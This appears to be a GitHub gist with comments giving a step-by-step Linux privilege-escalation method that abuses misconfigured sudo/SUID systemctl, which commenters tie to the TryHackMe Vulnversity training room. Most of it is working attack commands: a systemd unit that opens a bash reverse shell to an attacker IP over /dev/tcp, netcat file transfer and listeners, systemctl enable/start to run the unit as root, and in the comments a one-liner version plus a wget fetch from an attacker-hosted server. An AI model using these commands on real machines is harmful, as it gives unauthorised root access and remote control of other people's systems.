Skip to content

Instantly share code, notes, and snippets.

Last active September 19, 2023 04:17
  • Star 52 You must be signed in to star a gist
  • Fork 20 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For better reading experience

0. Prepare your payload root.service


ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'


1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable


find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port
nc -vl 44444 > root.service
Send file to traget
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/ to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Expand Knowlege

Copy link

froget about all that file transferring


find / -type d -maxdepth 2 -writable

-CD to writable dir-

-One liner -
RATME="'bash -i >& /dev/tcp/yourIPHere/9999 0>&1'" echo '[Unit]\nDescription=rooted-Oneliner\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c '$RATME'\n\n[Install]\' >root.service

/bin/systemctl enable /whatever-writable-dir/root.service
/bin/systemctl start root

Copy link

adibdz commented Sep 9, 2021

Just finished thm-vulnversity. I just found out that nc can transfer file. Before, I write the payload manually on victim machine with very slowly and patienly.

Copy link

Who is here for the vulnervisity room?

Copy link

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.

Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)


Copy link

17Chad commented Oct 7, 2022

The man, ty

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment